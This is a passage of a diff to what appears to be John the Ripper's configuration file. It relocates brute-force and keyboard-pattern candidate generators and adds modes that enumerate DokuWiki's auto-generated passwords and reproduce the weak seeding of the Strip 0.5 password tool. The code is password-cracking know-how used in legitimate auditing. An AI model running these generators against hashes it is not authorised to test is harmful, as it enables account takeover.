-			seedarray[next] = randnum;
-			/* END Random.Sample() */
-			j = 0;
-
-			if(candidate[i] == 0) {
-				while(boundaries_letters[j] < randnum) j++;
-				if(lowers[j] != word[i++]) break;
-			} else if (candidate[i] == 1) {
-				while(boundaries_letters[j] < randnum) j++;
-				if(uppers[j] != word[i++]) break;
-			} else if (candidate[i] == 2) {
-				while(boundaries_numbers[j] < randnum) j++;
-				if(numbers[j] != word[i++]) break;
-			} else { /* if (word[i] == 3) */
-				while(boundaries_symbols[j] < randnum) j++;
-				if(symbols[j] != word[i++]) break;
-			}
-		}
-		if(i == password_length) return;
-	}
-}
-
-# Try sequences of adjacent keys on a keyboard as candidate passwords
-[List.External:Keyboard]
-int maxlength, length;	// Maximum password length to try, current length
-int fuzz;		// The desired "fuzz factor", either 0 or 1
-int id[15];		// Current character indices for each position
-int m[0x800];		// The keys matrix
-int mc[0x100];		// Counts of adjacent keys
-int f[0x40], fc;	// Characters for the first position, their count
-
-void init()
-{
-	int minlength;
-	int i, j, c, p;
-	int k[0x40];
-
-	// Initial password length to try
-	if (req_minlen)
-		minlength = req_minlen;
-	else
-		minlength = 1;
-	if (req_maxlen)
-		maxlength = req_maxlen;
-	else
-		maxlength = cipher_limit;	// the format's limit
-	fuzz = 1;			// "Fuzz factor", set to 0 for much quicker runs
-
-/*
- * This defines the keyboard layout, by default for a QWERTY keyboard.
- */
-	i = 0; while (i < 0x40) k[i++] = 0;
-	k[0] = '`';
-	i = 0; while (++i <= 9) k[i] = '0' + i;
-	k[10] = '0'; k[11] = '-'; k[12] = '=';
-	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
-	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
-	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
-	k[0x1d] = '\\';
-	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
-	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
-	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
-	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
-	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
-	k[0x39] = '.'; k[0x3a] = '/';
-
-	i = 0; while (i < 0x100) mc[i++] = 0;
-	fc = 0;
-
-	/* rows */
-	c = 0;
-	i = 0;
-	while (i < 0x40) {
-		p = c;
-		c = k[i++] & 0xff;
-		if (!c) continue;
-		f[fc++] = c;
-		if (!p) continue;
-		m[(c << 3) + mc[c]++] = p;
-		m[(p << 3) + mc[p]++] = c;
-	}
-	f[fc] = 0;
-
-	/* columns */
-	i = 0;
-	while (i < 0x30) {
-		p = k[i++] & 0xff;
-		if (!p) continue;
-		j = 1 - fuzz;
-		while (j <= 1 + fuzz) {
-			c = k[i + 0x10 - j++] & 0xff;
-			if (!c) continue;
-			m[(c << 3) + mc[c]++] = p;
-			m[(p << 3) + mc[p]++] = c;
-		}
-	}
-
-	length = 0;
-	while (length < minlength)
-		id[length++] = 0;
-}
-
-void generate()
-{
-	int i, p, maxcount;
-
-	word[i = 0] = p = f[id[0]];
-	while (++i < length)
-		word[i] = p = m[(p << 3) + id[i]];
-	word[i--] = 0;
-
-	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	while (++id[i] >= maxcount) {
-		if (!i) {
-			if (length < maxlength) {
-				id[0] = 0;
-				id[length++] = 0;
-			}
-			return;
-		}
-		id[i--] = 0;
-		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	}
-}
-
-void restore()
-{
-	int i;
-
-	/* Calculate the length */
-	length = 0;
-	while (word[length])
-		id[length++] = 0;
-
-	/* Infer the first character index */
-	i = -1;
-	while (++i < fc) {
-		if (f[i] == word[0]) {
-			id[0] = i;
-			break;
-		}
-	}
-
-	/* This sample can be enhanced to infer the rest of the indices here */
-}
-
-# Simplest (fastest?) possible dumb exhaustive search, demonstrating a
-# mode that does not need any special restore() handling.
-# Defaults to printable ASCII.
-[List.External:DumbDumb]
-int maxlength;		// Maximum password length to try
-int startchar, endchar;	// Range of characters (inclusive)
-
-void init()
-{
-	int i;
-
-	startchar = ' ';	// Start with space
-	endchar = '~';		// End with tilde
-
-	// Create first word, honoring --min-len
-	if (!(i = req_minlen))
-		i++;
-	word[i] = 0;
-	while (i--)
-		word[i] = startchar;
-	word[0] = startchar - 1;
-
-	if (req_maxlen)
-		maxlength = req_maxlen;		// --max-len
-	else
-		maxlength = cipher_limit;	// format's limit
-}
-
-void generate()
-{
-	int i;
-
-	if (++word <= endchar)
-		return;
-
-	i = 0;
-
-	while (word[i] > endchar) {
-		word[i++] = startchar;
-		if (!word[i]) {
-			word[i] = startchar;
-			word[i + 1] = 0;
-		} else
-			word[i]++;
-	}
-
-	if (i >= maxlength)
-		word = 0;
-}
-
-/*
- * This mode will resume correctly without any restore handing.
- * The empty function just confirms to John that everything is in order.
- */
-void restore()
-{
-}
-
-# Generic implementation of "dumb" exhaustive search, given a range of lengths
-# and an arbitrary charset.  This is pre-configured to try 8-bit characters
-# against LM hashes, which is only reasonable to do for very short password
-# half lengths.
-[List.External:DumbForce]
-int maxlength;		// Maximum password length to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x100], c0;	// Character set
-
-void init()
-{
-	int minlength;
-	int i, c;
-
-	// Initial password length to try, must be at least 1
-	if (req_minlen)
-		minlength = req_minlen;
-	else
-		minlength = 1;
-	if (req_maxlen)
-		maxlength = req_maxlen;
-	else
-		maxlength = cipher_limit;	// the format's limit
-
-/*
- * This defines the character set.
- *
- * Let's say, we want to try TAB, all non-control ASCII characters, and all
- * 8-bit characters, including the 8-bit terminal controls range (as these are
- * used as regular national characters with some 8-bit encodings), but except
- * for known terminal controls (risky for the terminal we may be running on).
- *
- * Also, let's say our hashes are case-insensitive, so skip lowercase letters
- * (this is right for LM hashes).
- */
-	i = 0;
-	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
-	c = ' ';			// start with space (ASCII 32) and
-	while (c < 'a')			// proceed till lowercase 'a'
-		charset[i++] = c++;
-	c = 'z' + 1;			// Skip lowercase letters and
-	while (c <= 0x7e)		// proceed for all printable ASCII
-		charset[i++] = c++;
-	c++;				// Skip DEL (ASCII 127) and
-	while (c < 0x84)		// proceed over 8-bit codes till IND
-		charset[i++] = c++;
-	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
-	charset[i++] = 0x87;
-	c = 0x89;			// Skip HTS (88 hex)
-	while (c < 0x8d)		// Proceed till RI (8D hex)
-		charset[i++] = c++;
-	c = 0x91;			// Skip RI, SS2, SS3, DCS
-	while (c < 0x96)		// Proceed till SPA (96 hex)
-		charset[i++] = c++;
-	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
-	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
-	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
-		charset[i++] = c++;
-
-/* Zero-terminate it, and cache the first character */
-	charset[i] = 0;
-	c0 = charset[0];
-
-	last = minlength - 1;
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = -1;
-	word[i] = 0;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = charset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-	} else				// We're done
-		word = 0;
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = 0; while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = 0;	// Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Generic implementation of exhaustive search for a partially-known password.
-# This is pre-configured for length 8, lowercase and uppercase letters in the
-# first 4 positions (52 different characters), and digits in the remaining 4
-# positions - however, the corresponding part of init() may be modified to use
-# arbitrary character sets or even fixed characters for each position.
-[List.External:KnownForce]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length, maxlength;
-	int pos, ofs, i, c;
-
-	if (req_minlen)
-		length = req_minlen;
-	else
-		length = 8;	// Password length to try (NOTE: other [eg. shorter]
-				// lengths will not be tried!)
-	if (req_maxlen)
-		maxlength = req_maxlen;
-	else
-		maxlength = cipher_limit;	// the format's limit
-
-/* This defines the character sets for different character positions */
-	if (length > maxlength)
-		length = maxlength;
-	pos = 0;
-	while (pos < 4) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a';
-		while (c <= 'z')
-			charset[ofs + i++] = c++;
-		c = 'A';
-		while (c <= 'Z')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# A variation of KnownForce configured to try likely date and time strings.
-[List.External:DateTime]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Must be one of: 4, 5, 7, 8
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < length - 6) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	if (pos) {
-		ofs = pos++ << 8;
-		charset[ofs] = '/';
-		charset[ofs + 1] = '.';
-		charset[ofs + 2] = ':';
-		charset[ofs + 3] = 0;
-	}
-	while (pos < length - 3) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	ofs = pos++ << 8;
-	charset[ofs] = '/';
-	charset[ofs + 1] = '.';
-	charset[ofs + 2] = ':';
-	charset[ofs + 3] = 0;
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
 # Try strings of repeated characters.
 #
 # This is the code which is common for all [List.External:Repeats*]
@@ -3303,6 +2298,1140 @@ void generate()
 	word[i] = 0;
 }

+# Try sequences of adjacent keys on a keyboard as candidate passwords
+[List.External:Keyboard]
+int maxlength, length;	// Maximum password length to try, current length
+int fuzz;		// The desired "fuzz factor", either 0 or 1
+int id[15];		// Current character indices for each position
+int m[0x800];		// The keys matrix
+int mc[0x100];		// Counts of adjacent keys
+int f[0x40], fc;	// Characters for the first position, their count
+
+void init()
+{
+	int minlength;
+	int i, j, c, p;
+	int k[0x40];
+
+	// Initial password length to try
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	fuzz = 1;			// "Fuzz factor", set to 0 for much quicker runs
+
+/*
+ * This defines the keyboard layout, by default for a QWERTY keyboard.
+ */
+	i = 0; while (i < 0x40) k[i++] = 0;
+	k[0] = '`';
+	i = 0; while (++i <= 9) k[i] = '0' + i;
+	k[10] = '0'; k[11] = '-'; k[12] = '=';
+	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
+	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
+	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
+	k[0x1d] = '\\';
+	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
+	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
+	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
+	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
+	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
+	k[0x39] = '.'; k[0x3a] = '/';
+
+	i = 0; while (i < 0x100) mc[i++] = 0;
+	fc = 0;
+
+	/* rows */
+	c = 0;
+	i = 0;
+	while (i < 0x40) {
+		p = c;
+		c = k[i++] & 0xff;
+		if (!c) continue;
+		f[fc++] = c;
+		if (!p) continue;
+		m[(c << 3) + mc[c]++] = p;
+		m[(p << 3) + mc[p]++] = c;
+	}
+	f[fc] = 0;
+
+	/* columns */
+	i = 0;
+	while (i < 0x30) {
+		p = k[i++] & 0xff;
+		if (!p) continue;
+		j = 1 - fuzz;
+		while (j <= 1 + fuzz) {
+			c = k[i + 0x10 - j++] & 0xff;
+			if (!c) continue;
+			m[(c << 3) + mc[c]++] = p;
+			m[(p << 3) + mc[p]++] = c;
+		}
+	}
+
+	length = 0;
+	while (length < minlength)
+		id[length++] = 0;
+}
+
+void generate()
+{
+	int i, p, maxcount;
+
+	word[i = 0] = p = f[id[0]];
+	while (++i < length)
+		word[i] = p = m[(p << 3) + id[i]];
+	word[i--] = 0;
+
+	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	while (++id[i] >= maxcount) {
+		if (!i) {
+			if (length < maxlength) {
+				id[0] = 0;
+				id[length++] = 0;
+			}
+			return;
+		}
+		id[i--] = 0;
+		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	}
+}
+
+void restore()
+{
+	int i;
+
+	/* Calculate the length */
+	length = 0;
+	while (word[length])
+		id[length++] = 0;
+
+	/* Infer the first character index */
+	i = -1;
+	while (++i < fc) {
+		if (f[i] == word[0]) {
+			id[0] = i;
+			break;
+		}
+	}
+
+	/* This sample can be enhanced to infer the rest of the indices here */
+}
+
+# Simplest (fastest?) possible dumb exhaustive search, demonstrating a
+# mode that does not need any special restore() handling.
+# Defaults to printable ASCII.
+[List.External:DumbDumb]
+int maxlength;		// Maximum password length to try
+int startchar, endchar;	// Range of characters (inclusive)
+
+void init()
+{
+	int i;
+
+	startchar = ' ';	// Start with space
+	endchar = '~';		// End with tilde
+
+	// Create first word, honoring --min-len
+	if (!(i = req_minlen))
+		i++;
+	word[i] = 0;
+	while (i--)
+		word[i] = startchar;
+	word[0] = startchar - 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;		// --max-len
+	else
+		maxlength = cipher_limit;	// format's limit
+}
+
+void generate()
+{
+	int i;
+
+	if (++word <= endchar)
+		return;
+
+	i = 0;
+
+	while (word[i] > endchar) {
+		word[i++] = startchar;
+		if (!word[i]) {
+			word[i] = startchar;
+			word[i + 1] = 0;
+		} else
+			word[i]++;
+	}
+
+	if (i >= maxlength)
+		word = 0;
+}
+
+/*
+ * This mode will resume correctly without any restore handing.
+ * The empty function just confirms to John that everything is in order.
+ */
+void restore()
+{
+}
+
+# Generic implementation of "dumb" exhaustive search, given a range of lengths
+# and an arbitrary charset.  This is pre-configured to try 8-bit characters
+# against LM hashes, which is only reasonable to do for very short password
+# half lengths.
+[List.External:DumbForce]
+int maxlength;		// Maximum password length to try
+int last;		// Last character position, zero-based
+int lastid;		// Character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x100], c0;	// Character set
+
+void init()
+{
+	int minlength;
+	int i, c;
+
+	// Initial password length to try, must be at least 1
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/*
+ * This defines the character set.
+ *
+ * Let's say, we want to try TAB, all non-control ASCII characters, and all
+ * 8-bit characters, including the 8-bit terminal controls range (as these are
+ * used as regular national characters with some 8-bit encodings), but except
+ * for known terminal controls (risky for the terminal we may be running on).
+ *
+ * Also, let's say our hashes are case-insensitive, so skip lowercase letters
+ * (this is right for LM hashes).
+ */
+	i = 0;
+	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
+	c = ' ';			// start with space (ASCII 32) and
+	while (c < 'a')			// proceed till lowercase 'a'
+		charset[i++] = c++;
+	c = 'z' + 1;			// Skip lowercase letters and
+	while (c <= 0x7e)		// proceed for all printable ASCII
+		charset[i++] = c++;
+	c++;				// Skip DEL (ASCII 127) and
+	while (c < 0x84)		// proceed over 8-bit codes till IND
+		charset[i++] = c++;
+	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
+	charset[i++] = 0x87;
+	c = 0x89;			// Skip HTS (88 hex)
+	while (c < 0x8d)		// Proceed till RI (8D hex)
+		charset[i++] = c++;
+	c = 0x91;			// Skip RI, SS2, SS3, DCS
+	while (c < 0x96)		// Proceed till SPA (96 hex)
+		charset[i++] = c++;
+	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
+	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
+	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Generic implementation of exhaustive search for a partially-known password.
+# This is pre-configured for length 8, lowercase and uppercase letters in the
+# first 4 positions (52 different characters), and digits in the remaining 4
+# positions - however, the corresponding part of init() may be modified to use
+# arbitrary character sets or even fixed characters for each position.
+[List.External:KnownForce]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length, maxlength;
+	int pos, ofs, i, c;
+
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 8;	// Password length to try (NOTE: other [eg. shorter]
+				// lengths will not be tried!)
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+
+/* This defines the character sets for different character positions */
+	if (length > maxlength)
+		length = maxlength;
+	pos = 0;
+	while (pos < 4) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a';
+		while (c <= 'z')
+			charset[ofs + i++] = c++;
+		c = 'A';
+		while (c <= 'Z')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# A variation of KnownForce configured to try likely date and time strings.
+[List.External:DateTime]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int length;
+	int pos, ofs, i, c;
+
+	length = 8;	// Must be one of: 4, 5, 7, 8
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < length - 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	if (pos) {
+		ofs = pos++ << 8;
+		charset[ofs] = '/';
+		charset[ofs + 1] = '.';
+		charset[ofs + 2] = ':';
+		charset[ofs + 3] = 0;
+	}
+	while (pos < length - 3) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+	ofs = pos++ << 8;
+	charset[ofs] = '/';
+	charset[ofs + 1] = '.';
+	charset[ofs + 2] = ':';
+	charset[ofs + 3] = 0;
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = '0';
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# A variation of KnownForce configured to try all the 385641000 possible
+# auto-generated passwords of DokuWiki versions up to at least 2013-05-10.
+[List.External:DokuWiki]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int A[26], C[26], V[26];
+	int length;
+	int pos, ofs, i, c;
+
+	i = 0; while (i < 26) { A[i] = C[i] = 1; V[i++] = 0; }
+	i = 'a' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'e' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'i' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'o' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'u' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'q' - 'a'; A[i] = C[i] = 0;
+	i = 'x' - 'a'; A[i] = C[i] = 0;
+	i = 'y' - 'a'; A[i] = C[i] = 0;
+
+	length = 8;
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (C[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (V[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (A[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+	}
+	c = '1';
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+		c = '0';
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
+# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
+# crack passwords you may have generated with Strip; other uses of Strip
+# are unaffected.
+[List.External:Strip]
+int minlength, maxlength, mintype, maxtype;
+int crack_seed, length, type;
+int count, charset[128];
+
+void init()
+{
+	int c;
+
+/* Password lengths to try; Strip can generate passwords of 4 to 16
+ * characters, but traditional crypt(3) hashes are limited to 8. */
+	minlength = req_minlen;
+	if (minlength < 4)
+		minlength = 4;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	if (maxlength >16) maxlength = 16;
+
+/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
+	mintype = 0;	// 0
+	maxtype = 2;	// 2
+
+	crack_seed = 0x10000;
+	length = minlength - 1;
+	type = mintype;
+
+	count = 0;
+	c = '0'; while (c <= '9') charset[count++] = c++;
+}
+
+void generate()
+{
+	int seed, random;
+	int i, c;
+
+	if (crack_seed > 0xffff) {
+		crack_seed = 0;
+
+		if (++length > maxlength) {
+			length = minlength;
+
+			if (++type > maxtype) {
+				word[0] = 0;
+				return;
+			}
+		}
+
+		count = 10;
+		if (type >= 1) {
+			c = 'a'; while (c <= 'f') charset[count++] = c++;
+			c = 'h'; while (c <= 'z') charset[count++] = c++;
+			c = 'A'; while (c <= 'Z') charset[count++] = c++;
+		}
+		if (type == 2) {
+			charset[count++] = '!';
+			c = '#'; while (c <= '&') charset[count++] = c++;
+			c = '('; while (c <= '/') charset[count++] = c++;
+			c = '<'; while (c <= '>') charset[count++] = c++;
+			charset[count++] = '?'; charset[count++] = '@';
+			charset[count++] = '['; charset[count++] = ']';
+			charset[count++] = '^'; charset[count++] = '_';
+			c = '{'; while (c <= '~') charset[count++] = c++;
+		}
+	}
+
+	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
+
+	i = 0;
+	while (i < length) {
+		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
+		word[i++] = charset[random % count];
+	}
+
+	word[i] = 0;
+}
+
+/*
+ * This takes advantage of CVE-2013-2120 to find seeds that KDE Paste applet
+ * uses to generate passwords.
+ *
+ * This software is Copyright (c) Michael Samuel <mik@miknet.net>,
+ * and it is hereby released to the general public under the following terms:
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted.
+ */
+[List.External:KDEPaste]
+int charset[95];
